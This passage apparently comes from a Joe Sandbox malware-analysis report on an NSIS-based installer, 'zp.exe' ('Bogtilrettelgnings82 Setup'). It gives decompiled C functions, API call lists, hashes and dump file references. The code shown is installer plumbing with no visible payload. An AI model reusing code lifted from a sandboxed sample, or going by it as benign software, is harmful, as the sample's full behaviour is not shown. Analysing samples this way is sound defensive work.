                                                            								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                            								_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                            								_v12 = _t100;
                                                            								__eflags = _t100 - _t109 - 0x800;
                                                            								_v16 = _t109;
                                                            								_v8 = 0x422680;
                                                            								if(_t100 - _t109 < 0x800) {
                                                            									SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                            									SetCursor(LoadCursorA(0, 0x7f02));
                                                            									ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                            									SetCursor(LoadCursorA(0, 0x7f00));
                                                            									_t110 = _a16;
                                                            								}
                                                            							}
                                                            						}
                                                            						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                                                            						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
                                                            							goto L26;
                                                            						} else {
                                                            							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                                                            							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                            								goto L26;
                                                            							}
                                                            							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                            								SendMessageA( *0x4236e8, 0x111, 1, 0);
                                                            							}
                                                            							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                                                            							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                            								SendMessageA( *0x4236e8, 0x10, 0, 0);
                                                            							}
                                                            							return 1;
                                                            						}
                                                            					}
                                                            					__eflags = _a12 >> 0x10;
                                                            					if(_a12 >> 0x10 != 0) {
                                                            						goto L25;
                                                            					}
                                                            					__eflags =  *0x41ecac; // 0x0
                                                            					if(__eflags != 0) {
                                                            						goto L25;
                                                            					}
                                                            					_t103 =  *0x41f4b8; // 0x6f40bc
                                                            					_t25 = _t103 + 0x14; // 0x6f40d0
                                                            					_t112 = _t25;
                                                            					__eflags =  *_t112 & 0x00000020;
                                                            					if(( *_t112 & 0x00000020) == 0) {
                                                            						goto L25;
                                                            					}
                                                            					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                            					__eflags = _t106;
                                                            					 *_t112 = _t106;
                                                            					E00403FEE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                            					E0040439F();
                                                            					goto L11;
                                                            				} else {
                                                            					_t98 = _a16;
                                                            					_t113 =  *(_t98 + 0x30);
                                                            					if(_t113 < 0) {
                                                            						_t107 =  *0x422ebc; // 0x6f57cb
                                                            						_t113 =  *(_t107 - 4 + _t113 * 4);
                                                            					}
                                                            					_push( *((intOrPtr*)(_t98 + 0x34)));
                                                            					_t114 = _t113 +  *0x423718;
                                                            					_push(0x22);
                                                            					_a16 =  *_t114;
                                                            					_v12 = _v12 & 0x00000000;
                                                            					_t115 = _t114 + 1;
                                                            					_v16 = _t115;
                                                            					_v8 = E004040E0;
                                                            					E00403FCC(_a4);
                                                            					_push( *((intOrPtr*)(_t98 + 0x38)));
                                                            					_push(0x23);
                                                            					E00403FCC(_a4);
                                                            					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                            					E00403FEE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                            					_t99 = GetDlgItem(_a4, 0x3e8);
                                                            					E00404001(_t99);
                                                            					SendMessageA(_t99, 0x45b, 1, 0);
                                                            					_t86 =  *( *0x4236f0 + 0x68);
                                                            					if(_t86 < 0) {
                                                            						_t86 = GetSysColor( ~_t86);
                                                            					}
                                                            					SendMessageA(_t99, 0x443, 0, _t86);
                                                            					SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                            					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                            					 *0x41ecac = 0;
                                                            					SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                            					 *0x41ecac = 0;
                                                            					return 0;
                                                            				}
                                                            			}




















                                                            0x00404125
                                                            0x00404237
                                                            0x0040424a
                                                            0x004042a6
                                                            0x004042a6
                                                            0x004042aa
                                                            0x0040437a
                                                            0x00404381
                                                            0x00404383
                                                            0x00404383
                                                            0x00404383
                                                            0x00404389
                                                            0x00404389
                                                            0x0040438c
                                                            0x00000000
                                                            0x00404393
                                                            0x004042b8
                                                            0x004042ba
                                                            0x004042bd
                                                            0x004042c4
                                                            0x004042c6
                                                            0x004042cd
                                                            0x004042cf
                                                            0x004042d2
                                                            0x004042d5
                                                            0x004042da
                                                            0x004042e0
                                                            0x004042e3
                                                            0x004042ea
                                                            0x004042f8
                                                            0x00404310
                                                            0x00404323
                                                            0x00404333
                                                            0x00404335
                                                            0x00404335
                                                            0x004042ea
                                                            0x004042cd
                                                            0x00404338
                                                            0x0040433f
                                                            0x00000000
                                                            0x00404341
                                                            0x00404341
                                                            0x00404348
                                                            0x00000000
                                                            0x00000000
                                                            0x0040434a
                                                            0x0040434e
                                                            0x0040435f
                                                            0x0040435f
                                                            0x00404361
                                                            0x00404365
                                                            0x00404373
                                                            0x00404373
                                                            0x00000000
                                                            0x00404377
                                                            0x0040433f
                                                            0x00404252
                                                            0x00404255
                                                            0x00000000
                                                            0x00000000
                                                            0x0040425d
                                                            0x00404263
                                                            0x00000000
                                                            0x00000000
                                                            0x00404269
                                                            0x0040426f
                                                            0x0040426f
                                                            0x00404272
                                                            0x00404275
                                                            0x00000000
                                                            0x00000000
                                                            0x00404298
                                                            0x00404298
                                                            0x0040429a
                                                            0x0040429c
                                                            0x004042a1
                                                            0x00000000
                                                            0x0040412b
                                                            0x0040412b
                                                            0x0040412e
                                                            0x00404133
                                                            0x00404135
                                                            0x00404144
                                                            0x00404144
                                                            0x0040414b
                                                            0x0040414e
                                                            0x00404150
                                                            0x00404155
                                                            0x0040415e
                                                            0x00404164
                                                            0x00404170
                                                            0x00404173
                                                            0x0040417c
                                                            0x00404181
                                                            0x00404184
                                                            0x00404189
                                                            0x004041a0
                                                            0x004041a7
                                                            0x004041ba
                                                            0x004041bd
                                                            0x004041d2
                                                            0x004041d9
                                                            0x004041de
                                                            0x004041e3
                                                            0x004041e3
                                                            0x004041f2
                                                            0x00404201
                                                            0x00404213
                                                            0x00404218
                                                            0x00404228
                                                            0x0040422a
                                                            0x00000000
                                                            0x00404230

                                                            APIs
                                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041A0
                                                            • GetDlgItem.USER32(00000000,000003E8), ref: 004041B4
                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041D2
                                                            • GetSysColor.USER32(?), ref: 004041E3
                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004041F2
                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404201
                                                            • lstrlenA.KERNEL32(?), ref: 00404204
                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404213
                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404228
                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040428A
                                                            • SendMessageA.USER32(00000000), ref: 0040428D
                                                            • GetDlgItem.USER32(?,000003E8), ref: 004042B8
                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004042F8
                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00404307
                                                            • SetCursor.USER32(00000000), ref: 00404310
                                                            • ShellExecuteA.SHELL32(0000070B,open,00422680,00000000,00000000,00000001), ref: 00404323
                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00404330
                                                            • SetCursor.USER32(00000000), ref: 00404333
                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040435F
                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404373
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                            • String ID: Call$N$open$@@
                                                            • API String ID: 3615053054-3329210235
                                                            • Opcode ID: 968b0e608722a5a4807cbf1cbf6d651574c4be42df1e23b0a274a5bf77e584f7
                                                            • Instruction ID: 7e55316eb6edc40c7699564df6a93aee63aedbce2365efaa8751590eb61f664c
                                                            • Opcode Fuzzy Hash: 968b0e608722a5a4807cbf1cbf6d651574c4be42df1e23b0a274a5bf77e584f7
                                                            • Instruction Fuzzy Hash: C561A2B1A40305BFEB109F61CC45F6A7B69FB84715F10802AFA05BA2D1C7B8A951CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                            				struct tagLOGBRUSH _v16;
                                                            				struct tagRECT _v32;
                                                            				struct tagPAINTSTRUCT _v96;
                                                            				struct HDC__* _t70;
                                                            				struct HBRUSH__* _t87;
                                                            				struct HFONT__* _t94;
                                                            				long _t102;
                                                            				signed int _t126;
                                                            				struct HDC__* _t128;
                                                            				intOrPtr _t130;
                                                            
                                                            				if(_a8 == 0xf) {
                                                            					_t130 =  *0x4236f0;
                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                            					_a8 = _t70;
                                                            					GetClientRect(_a4,  &_v32);
                                                            					_t126 = _v32.bottom;
                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                            					while(_v32.top < _t126) {
                                                            						_a12 = _t126 - _v32.top;
                                                            						asm("cdq");
                                                            						asm("cdq");
                                                            						asm("cdq");
                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                            						_v32.bottom = _v32.bottom + 4;
                                                            						_a16 = _t87;
                                                            						FillRect(_a8,  &_v32, _t87);
                                                            						DeleteObject(_a16);
                                                            						_v32.top = _v32.top + 4;
                                                            					}
                                                            					if( *(_t130 + 0x58) != 0xffffffff) {
                                                            						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                            						_a16 = _t94;
                                                            						if(_t94 != 0) {
                                                            							_t128 = _a8;
                                                            							_v32.left = 0x10;
                                                            							_v32.top = 8;
                                                            							SetBkMode(_t128, 1);
                                                            							SetTextColor(_t128,  *(_t130 + 0x58));
                                                            							_a8 = SelectObject(_t128, _a16);
                                                            							DrawTextA(_t128, "Bogtilrettelgnings82 Setup", 0xffffffff,  &_v32, 0x820);
                                                            							SelectObject(_t128, _a8);
                                                            							DeleteObject(_a16);
                                                            						}
                                                            					}
                                                            					EndPaint(_a4,  &_v96);
                                                            					return 0;
                                                            				}
                                                            				_t102 = _a16;
                                                            				if(_a8 == 0x46) {
                                                            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                            					 *((intOrPtr*)(_t102 + 4)) =  *0x4236e8;
                                                            				}
                                                            				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                            			}













                                                            0x0040100a
                                                            0x00401039
                                                            0x00401047
                                                            0x0040104d
                                                            0x00401051
                                                            0x0040105b
                                                            0x00401061
                                                            0x00401064
                                                            0x004010f3
                                                            0x00401089
                                                            0x0040108c
                                                            0x004010a6
                                                            0x004010bd
                                                            0x004010cc
                                                            0x004010cf
                                                            0x004010d5
                                                            0x004010d9
                                                            0x004010e4
                                                            0x004010ed
                                                            0x004010ef
                                                            0x004010ef
                                                            0x00401100
                                                            0x00401105
                                                            0x0040110d
                                                            0x00401110
                                                            0x00401112
                                                            0x00401118
                                                            0x0040111f
                                                            0x00401126
                                                            0x00401130
                                                            0x00401142
                                                            0x00401156
                                                            0x00401160
                                                            0x00401165
                                                            0x00401165
                                                            0x00401110
                                                            0x0040116e
                                                            0x00000000
                                                            0x00401178
                                                            0x00401010
                                                            0x00401013
                                                            0x00401015
                                                            0x0040101f
                                                            0x0040101f
                                                            0x00000000

                                                            APIs
                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextA.USER32(00000000,Bogtilrettelgnings82 Setup,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: Bogtilrettelgnings82 Setup$F
                                                            • API String ID: 941294808-2905091986
                                                            • Opcode ID: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                            • Instruction ID: b42f37c54e1c8f574f2bede5c8fc4b0b0bf13e7bd3a3dea2e6496186089e6917
                                                            • Opcode Fuzzy Hash: a90db4dcded700d55ffd4d6edc3f30b5524a69ea874a0a58a5b4fb777f83a2a0
                                                            • Instruction Fuzzy Hash: A8419B71804249AFCB058F94CD459BFBBB9FF44310F00812AF961AA1A0C778EA50DFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405A16() {
                                                            				void* __ebx;
                                                            				void* __ecx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				long _t14;
                                                            				long _t26;
                                                            				char* _t34;
                                                            				int _t40;
                                                            				void* _t41;
                                                            				intOrPtr* _t42;
                                                            				long _t45;
                                                            				CHAR* _t47;
                                                            				void* _t49;
                                                            				void* _t51;
                                                            				void* _t52;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            
                                                            				lstrcpyA(0x421a70, "NUL");
                                                            				_t47 =  *(_t55 + 0x1c);
                                                            				if(_t47 == 0) {
                                                            					L3:
                                                            					_t14 = GetShortPathNameA( *(_t55 + 0x20), 0x421e70, 0x400);
                                                            					if(_t14 != 0 && _t14 <= 0x400) {
                                                            						_t40 = wsprintfA(0x421670, "%s=%s\r\n", 0x421a70, 0x421e70);
                                                            						_t56 = _t55 + 0x10;
                                                            						E00405D00(_t40, 0x421a70, 0x421e70, 0x421e70,  *((intOrPtr*)( *0x4236f0 + 0x128)));
                                                            						_t14 = E0040596F(0x421e70, 0xc0000000, 4);
                                                            						_t51 = _t14;
                                                            						 *(_t56 + 0x1c) = _t51;
                                                            						if(_t51 != 0xffffffff) {
                                                            							_t45 = GetFileSize(_t51, 0);
                                                            							_t6 = _t40 + 0xa; // 0xa
                                                            							_t49 = GlobalAlloc(0x40, _t45 + _t6);
                                                            							if(_t49 == 0 || E004059E7(_t51, _t49, _t45) == 0) {
                                                            								L18:
                                                            								return CloseHandle(_t51);
                                                            							} else {
                                                            								if(E004058D4(_t41, _t49, "[Rename]\r\n") != 0) {
                                                            									_t52 = E004058D4(_t41, _t23 + 0xa, 0x409384);
                                                            									if(_t52 == 0) {
                                                            										_t51 =  *(_t56 + 0x1c);
                                                            										L16:
                                                            										_t26 = _t45;
                                                            										L17:
                                                            										E0040592A(_t26 + _t49, 0x421670, _t40);
                                                            										SetFilePointer(_t51, 0, 0, 0);
                                                            										WriteFile(_t51, _t49, _t45 + _t40, _t56 + 0x10, 0);
                                                            										GlobalFree(_t49);
                                                            										goto L18;
                                                            									}
                                                            									_t42 = _t49 + _t45;
                                                            									_t34 = _t42 + _t40;
                                                            									while(_t42 > _t52) {
                                                            										 *_t34 =  *_t42;
                                                            										_t34 = _t34 - 1;
                                                            										_t42 = _t42 - 1;
                                                            									}
                                                            									_t26 = _t52 - _t49 + 1;
                                                            									_t51 =  *(_t56 + 0x1c);
                                                            									goto L17;
                                                            								}
                                                            								lstrcpyA(_t49 + _t45, "[Rename]\r\n");
                                                            								_t45 = _t45 + 0xa;
                                                            								goto L16;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					CloseHandle(E0040596F(_t47, 0, 1));
                                                            					_t14 = GetShortPathNameA(_t47, 0x421a70, 0x400);
                                                            					if(_t14 != 0 && _t14 <= 0x400) {
                                                            						goto L3;
                                                            					}
                                                            				}
                                                            				return _t14;
                                                            			}




















                                                            0x00405a26
                                                            0x00405a2c
                                                            0x00405a3d
                                                            0x00405a65
                                                            0x00405a70
                                                            0x00405a74
                                                            0x00405a94
                                                            0x00405a9b
                                                            0x00405aa5
                                                            0x00405ab2
                                                            0x00405ab7
                                                            0x00405abc
                                                            0x00405ac0
                                                            0x00405acf
                                                            0x00405ad1
                                                            0x00405ade
                                                            0x00405ae2
                                                            0x00405b85
                                                            0x00000000
                                                            0x00405af8
                                                            0x00405b05
                                                            0x00405b29
                                                            0x00405b2d
                                                            0x00405b4c
                                                            0x00405b50
                                                            0x00405b50
                                                            0x00405b52
                                                            0x00405b5b
                                                            0x00405b66
                                                            0x00405b78
                                                            0x00405b7f
                                                            0x00000000
                                                            0x00405b7f
                                                            0x00405b2f
                                                            0x00405b32
                                                            0x00405b3d
                                                            0x00405b39
                                                            0x00405b3b
                                                            0x00405b3c
                                                            0x00405b3c
                                                            0x00405b44
                                                            0x00405b46
                                                            0x00000000
                                                            0x00405b46
                                                            0x00405b10
                                                            0x00405b16
                                                            0x00000000
                                                            0x00405b16
                                                            0x00405ae2
                                                            0x00405ac0
                                                            0x00405a3f
                                                            0x00405a4a
                                                            0x00405a53
                                                            0x00405a57
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a57
                                                            0x00405b91

                                                            APIs
                                                            • lstrcpyA.KERNEL32(00421A70,NUL,?,00000000,?,00000000,?,00405BBA,?,?,00000001,0040575D,?,00000000,000000F1,?), ref: 00405A26
                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BBA,?,?,00000001,0040575D,?,00000000,000000F1,?), ref: 00405A4A
                                                            • GetShortPathNameA.KERNEL32(00000000,00421A70,00000400), ref: 00405A53
                                                              • Part of subcall function 004058D4: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 004058E4
                                                              • Part of subcall function 004058D4: lstrlenA.KERNEL32(00405B03,?,00000000,00405B03,00000000,[Rename],00000000,00000000,00000000), ref: 00405916
                                                            • GetShortPathNameA.KERNEL32(?,00421E70,00000400), ref: 00405A70
                                                            • wsprintfA.USER32 ref: 00405A8E
                                                            • GetFileSize.KERNEL32(00000000,00000000,00421E70,C0000000,00000004,00421E70,?,?,?,?,?), ref: 00405AC9
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405AD8
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B10
                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421670,00000000,-0000000A,00409384,00000000,[Rename],00000000,00000000,00000000), ref: 00405B66
                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B78
                                                            • GlobalFree.KERNEL32(00000000), ref: 00405B7F
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405B86
                                                              • Part of subcall function 0040596F: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\zp.exe,80000000,00000003), ref: 00405973
                                                              • Part of subcall function 0040596F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405995
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.5770307662.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.5770278875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770363207.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770406479.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.5770672204.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_zp.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                            • String ID: %s=%s$NUL$[Rename]
                                                            • API String ID: 1265525490-4148678300
                                                            • Opcode ID: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                            • Instruction ID: 2a91906f743b427df7c641563761ed76cd06f16afc5903481ab5df03799b8c64
                                                            • Opcode Fuzzy Hash: 528c8e05f065cfa3c8aada060b3593fff01c3e64de514651854ef4bd2afcc741
                                                            • Instruction Fuzzy Hash: ED41CFB1604B15BFD2206B615C49F6B3A6CDB45764F14013AFD05B62D2EA7CBC018E7D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 86%
                                                            			E100023D6(void* __edx) {
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t22;
                                                            				void* _t23;
                                                            				short* _t24;
                                                            				void* _t25;
                                                            				void* _t30;
                                                            				void* _t32;
                                                            				void* _t34;
                                                            				void* _t36;
                                                            				void* _t40;
                                                            				void* _t43;
                                                            				int _t48;
                                                            				void* _t49;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				short** _t57;
                                                            				intOrPtr _t58;
                                                            				short** _t61;
                                                            				void* _t62;
                                                            
                                                            				_t55 = __edx;
                                                            				_t19 =  *((intOrPtr*)(_t62 + 8));
                                                            				_t58 =  *((intOrPtr*)(_t19 + 0x814));
                                                            				 *((intOrPtr*)(_t62 + 0x10)) = _t58;
                                                            				_t61 = (_t58 + 0x41 << 5) + _t19;
                                                            				do {
                                                            					if( *((intOrPtr*)(_t61 - 4)) != 0xffffffff) {
                                                            						_t57 = _t61;
                                                            					} else {
                                                            						_t57 =  *_t61;
                                                            					}
                                                            					_t56 = E10001215();
                                                            					_t48 = 0;
                                                            					_t22 =  *((intOrPtr*)(_t61 - 8));
                                                            					if(_t22 == 0) {
                                                            						 *_t56 =  *_t56 & 0x00000000;
                                                            					} else {
                                                            						_t30 = _t22 - 1;
                                                            						if(_t30 == 0) {
                                                            							_push( *_t57);
                                                            							goto L12;
                                                            						} else {
                                                            							_t32 = _t30 - 1;
                                                            							if(_t32 == 0) {
                                                            								E10001446(_t55,  *_t57, _t57[1], _t56);
                                                            								goto L13;
                                                            							} else {
                                                            								_t34 = _t32 - 1;
                                                            								if(_t34 == 0) {
                                                            									lstrcpynA(_t56,  *_t57,  *0x1000405c);
                                                            								} else {
                                                            									_t36 = _t34 - 1;
                                                            									if(_t36 == 0) {
                                                            										WideCharToMultiByte(0, 0,  *_t57,  *0x1000405c, _t56,  *0x1000405c - 1, 0, 0);
                                                            										 *( *0x1000405c + _t56 - 1) =  *( *0x1000405c + _t56 - 1) & 0x00000000;
                                                            									} else {
                                                            										_t40 = _t36 - 1;
                                                            										if(_t40 == 0) {
                                                            											_t43 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
                                                            											_t49 = _t43;
                                                            											__imp__StringFromGUID2( *_t57, _t49,  *0x1000405c);
                                                            											WideCharToMultiByte(0, 0, _t49,  *0x1000405c, _t56,  *0x1000405c, 0, 0);
                                                            											GlobalFree(_t49);
                                                            											_t48 = 0;
                                                            										} else {
                                                            											if(_t40 == 1) {
                                                            												_push( *_t61);
                                                            												L12:
                                                            												wsprintfA(_t56, 0x10004000);
                                                            												L13:
                                                            												_t62 = _t62 + 0xc;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					_t23 = _t61[5];
                                                            					if(_t23 != _t48 && ( *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x18)))) != 2 ||  *((intOrPtr*)(_t61 - 4)) > _t48)) {
                                                            						GlobalFree(_t23);
                                                            					}
                                                            					_t24 = _t61[4];
                                                            					if(_t24 != _t48) {
                                                            						if(_t24 != 0xffffffff) {
                                                            							if(_t24 > _t48) {
                                                            								E100012E8(_t24 - 1, _t56);
                                                            								goto L29;
                                                            							}
                                                            						} else {
                                                            							E10001278(_t56);
                                                            							L29:
                                                            						}
                                                            					}
                                                            					_t25 = GlobalFree(_t56);
                                                            					 *((intOrPtr*)(_t62 + 0x10)) =  *((intOrPtr*)(_t62 + 0x10)) - 1;
                                                            					_t61 = _t61 - 0x20;
                                                            				} while ( *((intOrPtr*)(_t62 + 0x10)) >= _t48);
                                                            				return _t25;
                                                            			}






















                                                            0x100023d6
                                                            0x100023d7
                                                            0x100023de
                                                            0x100023e5
                                                            0x100023ef
                                                            0x100023f1
                                                            0x100023f5
                                                            0x100023fc
                                                            0x100023f7
                                                            0x100023f7
                                                            0x100023f7
                                                            0x10002403
                                                            0x10002408
                                                            0x1000240a
                                                            0x1000240c
                                                            0x100024d7
                                                            0x10002412
                                                            0x10002412
                                                            0x10002413
                                                            0x100024d0
                                                            0x00000000
                                                            0x10002419
                                                            0x10002419
                                                            0x1000241a
                                                            0x100024c6
                                                            0x00000000
                                                            0x10002420
                                                            0x10002420
                                                            0x10002421
                                                            0x100024b8
                                                            0x10002427
                                                            0x10002427
                                                            0x10002428
                                                            0x1000249d
                                                            0x100024a8
                                                            0x1000242a
                                                            0x1000242a
                                                            0x1000242b
                                                            0x10002455
                                                            0x10002461
                                                            0x10002466
                                                            0x1000247b
                                                            0x10002482
                                                            0x10002488
                                                            0x1000242d
                                                            0x1000242e
                                                            0x10002434
                                                            0x10002437
                                                            0x1000243d
                                                            0x10002443
                                                            0x10002443
                                                            0x10002443
                                                            0x1000242e
                                                            0x1000242b
                                                            0x10002428
                                                            0x10002421
                                                            0x1000241a
                                                            0x10002413
                                                            0x100024da
                                                            0x100024df
                                                            0x100024f0
                                                            0x100024f0
                                                            0x100024f6
                                                            0x100024fb
                                                            0x10002500
                                                            0x1000250c
                                                            0x10002511
                                                            0x00000000
                                                            0x10002516
                                                            0x10002502
                                                            0x10002503
                                                            0x10002517
                                                            0x10002517
                                                            0x10002500
                                                            0x10002519
                                                            0x1000251f
                                                            0x10002523
                                                            0x10002526
                                                            0x10002535

                                                            APIs
                                                            • wsprintfA.USER32 ref: 1000243D
                                                            • GlobalAlloc.KERNEL32(00000040,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002455
